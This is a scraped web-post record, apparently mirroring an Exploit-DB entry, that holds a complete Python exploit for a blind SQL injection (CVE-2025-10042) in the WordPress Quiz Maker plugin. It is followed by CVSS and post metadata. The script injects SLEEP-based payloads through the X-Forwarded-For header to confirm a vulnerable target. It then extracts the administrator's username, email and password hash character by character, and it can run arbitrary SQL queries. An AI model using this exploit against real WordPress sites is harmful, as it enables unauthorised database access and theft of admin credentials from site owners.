{“lastseen”:”2025-12-25T20:46:49″,”description”:”Exploit Title: WordPress Quiz Maker 6.7.0.56 – SQL Injection Date: 2025-12-16 Exploit Author: Rahul Sreenivasan Tr0j4n Vendor Homepage: https:\/\/ays-pro.com\/wordpress\/quiz-maker Software Link: https:\/\/wordpress.org\/plugins\/quiz-maker\/ Version: =…”,”published”:”2025-12-25T00:00:00″,”modified”:”2025-12-25T00:00:00″,”type”:”exploitdb”,”title”:”WordPress Quiz Maker 6.7.0.56 – SQL Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52465″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-10042″],”sourceData”:”# Exploit Title: WordPress Quiz Maker 6.7.0.56 – SQL Injection\\r\\n# Date: 2025-12-16\\r\\n# Exploit Author: Rahul Sreenivasan (Tr0j4n)\\r\\n# Vendor Homepage: https:\/\/ays-pro.com\/wordpress\/quiz-maker\\r\\n# Software Link: https:\/\/wordpress.org\/plugins\/quiz-maker\/\\r\\n# Version: \\u003c= 6.7.0.56\\r\\n# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu\/Nginx\/PHP-FPM\\r\\n# CVE: CVE-2025-10042\\r\\n\\r\\nfrom argparse import ArgumentParser\\r\\nfrom requests import get\\r\\nfrom requests.packages.urllib3 import disable_warnings\\r\\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\\r\\nfrom time import time\\r\\nfrom sys import exit\\r\\n\\r\\ndisable_warnings(InsecureRequestWarning)\\r\\n\\r\\nCHARSET = \\”0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$\/:?\\”\\r\\n\\r\\ndef send_payload(url, path, header, payload, timeout):\\r\\n target = f\\”{url.rstrip(‘\/’)}\/{path.lstrip(‘\/’)}\\”\\r\\n headers = {\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\”,\\r\\n header: payload\\r\\n }\\r\\n try:\\r\\n start = time()\\r\\n get(target, headers=headers, timeout=timeout, verify=False)\\r\\n return time() – start\\r\\n except:\\r\\n return timeout\\r\\n\\r\\ndef check_vulnerable(url, path, header, sleep_time, timeout):\\r\\n print(\\”[*] Testing for SQL injection vulnerability…\\”)\\r\\n \\r\\n baseline = send_payload(url, path, header, \\”127.0.0.1\\”, timeout)\\r\\n print(f\\”[*] Baseline response time: {baseline:.2f}s\\”)\\r\\n \\r\\n payload = f\\”1′ OR SLEEP({sleep_time})#\\”\\r\\n injection = send_payload(url, path, header, payload, timeout)\\r\\n print(f\\”[*] Injection response time: {injection:.2f}s\\”)\\r\\n \\r\\n if injection \\u003e= sleep_time * 0.7:\\r\\n print(\\”[+] Target is VULNERABLE!\\”)\\r\\n return True\\r\\n else:\\r\\n print(\\”[-] Target does not appear to be vulnerable.\\”)\\r\\n return False\\r\\n\\r\\ndef extract_length(url, path, header, query, timeout):\\r\\n low, high = 1, 100\\r\\n \\r\\n while low \\u003c high:\\r\\n mid = (low + high) \/\/ 2\\r\\n payload = f\\”1′ OR IF(LENGTH(({query}))\\u003e{mid},SLEEP(1),0)#\\”\\r\\n elapsed = send_payload(url, path, header, payload, timeout)\\r\\n \\r\\n if elapsed \\u003e= 0.8:\\r\\n low = mid + 1\\r\\n else:\\r\\n high = mid\\r\\n \\r\\n return low\\r\\n\\r\\ndef extract_char(url, path, header, query, position, timeout):\\r\\n low, high = 32, 126\\r\\n \\r\\n while low \\u003c high:\\r\\n mid = (low + high) \/\/ 2\\r\\n payload = f\\”1′ OR IF(ASCII(SUBSTRING(({query}),{position},1))\\u003e{mid},SLEEP(1),0)#\\”\\r\\n elapsed = send_payload(url, path, header, payload, timeout)\\r\\n \\r\\n if elapsed \\u003e= 0.8:\\r\\n low = mid + 1\\r\\n else:\\r\\n high = mid\\r\\n \\r\\n return chr(low) if low \\u003c= 126 else \\”?\\”\\r\\n\\r\\ndef extract_data(url, path, header, query, timeout):\\r\\n length = extract_length(url, path, header, query, timeout)\\r\\n print(f\\”[*] Data length: {length}\\”)\\r\\n \\r\\n result = \\”\\”\\r\\n for i in range(1, length + 1):\\r\\n char = extract_char(url, path, header, query, i, timeout)\\r\\n result += char\\r\\n print(f\\”\\\\r[*] Extracting: {result}\\”, end=\\”\\”, flush=True)\\r\\n \\r\\n print()\\r\\n return result\\r\\n\\r\\ndef dump_users(url, path, header, timeout):\\r\\n print(\\”\\\\n[*] Extracting WordPress admin users…\\”)\\r\\n \\r\\n # Get admin user login\\r\\n query = \\”SELECT user_login FROM wp_users WHERE ID=1\\”\\r\\n username = extract_data(url, path, header, query, timeout)\\r\\n print(f\\”[+] Username: {username}\\”)\\r\\n \\r\\n # Get admin email\\r\\n query = \\”SELECT user_email FROM wp_users WHERE ID=1\\”\\r\\n email = extract_data(url, path, header, query, timeout)\\r\\n print(f\\”[+] Email: {email}\\”)\\r\\n \\r\\n # Get password hash\\r\\n query = \\”SELECT user_pass FROM wp_users WHERE ID=1\\”\\r\\n password = extract_data(url, path, header, query, timeout)\\r\\n print(f\\”[+] Password Hash: {password}\\”)\\r\\n \\r\\n return username, email, password\\r\\n\\r\\ndef main():\\r\\n parser = ArgumentParser(description=\\”WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)\\”)\\r\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, help=\\”Target WordPress URL\\”)\\r\\n parser.add_argument(\\”-p\\”, \\”–path\\”, required=True, help=\\”Path to quiz page\\”)\\r\\n parser.add_argument(\\”-H\\”, \\”–header\\”, default=\\”X-Forwarded-For\\”, help=\\”Header for injection\\”)\\r\\n parser.add_argument(\\”-t\\”, \\”–timeout\\”, type=int, default=10, help=\\”Request timeout\\”)\\r\\n parser.add_argument(\\”–check\\”, action=\\”store_true\\”, help=\\”Only check vulnerability\\”)\\r\\n parser.add_argument(\\”–dump\\”, action=\\”store_true\\”, help=\\”Dump admin credentials\\”)\\r\\n parser.add_argument(\\”–query\\”, help=\\”Custom SQL query to extract\\”)\\r\\n args = parser.parse_args()\\r\\n \\r\\n print(\\”[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)\\”)\\r\\n print(f\\”[+] Target: {args.url}\\”)\\r\\n \\r\\n if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):\\r\\n exit(1)\\r\\n \\r\\n if args.check:\\r\\n exit(0)\\r\\n \\r\\n if args.dump:\\r\\n dump_users(args.url, args.path, args.header, args.timeout)\\r\\n elif args.query:\\r\\n print(f\\”\\\\n[*] Executing custom query: {args.query}\\”)\\r\\n result = extract_data(args.url, args.path, args.header, args.query, args.timeout)\\r\\n print(f\\”[+] Result: {result}\\”)\\r\\n else:\\r\\n dump_users(args.url, args.path, args.header, args.timeout)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52465″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52465″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-25T20:46:49″,”description”:”Exploit Title: WordPress Quiz Maker 6.7.0.56 – SQL Injection Date: 2025-12-16 Exploit Author: Rahul Sreenivasan Tr0j4n Vendor Homepage: https:\/\/ays-pro.com\/wordpress\/quiz-maker Software Link: https:\/\/wordpress.org\/plugins\/quiz-maker\/ Version: =…”,”published”:”2025-12-25T00:00:00″,”modified”:”2025-12-25T00:00:00″,”type”:”exploitdb”,”title”:”WordPress Quiz…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,40,15,13,7,11,5],"class_list":["post-32861","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n